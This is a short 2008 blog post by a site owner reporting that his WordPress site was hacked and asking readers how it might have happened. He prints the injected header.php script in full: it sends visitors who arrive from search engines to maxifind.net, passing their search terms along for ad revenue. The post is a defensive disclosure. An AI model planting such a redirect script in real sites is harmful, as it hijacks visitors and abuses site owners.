My Site was Hacked
June 19th, 2008
Apologies to any visitors that were redirected away from my site to some random search site. I’m not quite sure how, but somehow the following was injected into my wordpress ‘header.php’ file:
<script> var r=document.referrer,t=\"\",q; if(r.indexOf(\"google.\")!=-1)t=\"q\"; if(r.indexOf(\"msn.\")!=-1)t=\"q\"; if(r.indexOf(\"yahoo.\")!=-1)t=\"p\"; if(r.indexOf(\"altavista.\")!=-1)t=\"q\"; if(r.indexOf(\"aol.\")!=-1)t=\"query\"; if(r.indexOf(\"ask.\")!=-1)t=\"q\"; if(t.length&&((q=r.indexOf(\"?\"+t+\"=\"))!=-1||(q=r.indexOf(\"&\"+t+\"=\"))!=-1)) window.location=\"http://maxifind.net/index.php?pf_id=361&q=\" +r.substring(q+2+t.length).split(\"&\")[0]; </script>
The way the above code works is that if a user is referred to the site via a search engine the user is immediately redirected to “maxifind.net”, which then displays ads related to the keywords from the search engine referer string. For any adnetworks out there — as this code as mostly definitely NOT inserted by me!!! Looking from traffic logs it appears as if “exit rates” spikes dramatically late last week so thankfully it’s only been up for a ccouple days.
Any suggestions as to how this happened would be appreciated. In the meantime I’ve changed all passwds and am in the process of upgrading my WordPress (which I haven’t done in a year… oops). It definitely goes to show, unless you’re going to put significant effort in maintaining your own software it’s much better to leave the hosting to someone else!
Related Posts:
- Site Issues…
- Site Redesign/Troubles
- Anti-malvertising.com
- Upgrading WordPress
- Don’t forget about Myspace
-
http://www.yardley.ca/ Greg
-
http://justinsomnia.org/ Justin Watt
-
Mike
-
Debbie D
-
http://bizarrenews.co.uk janey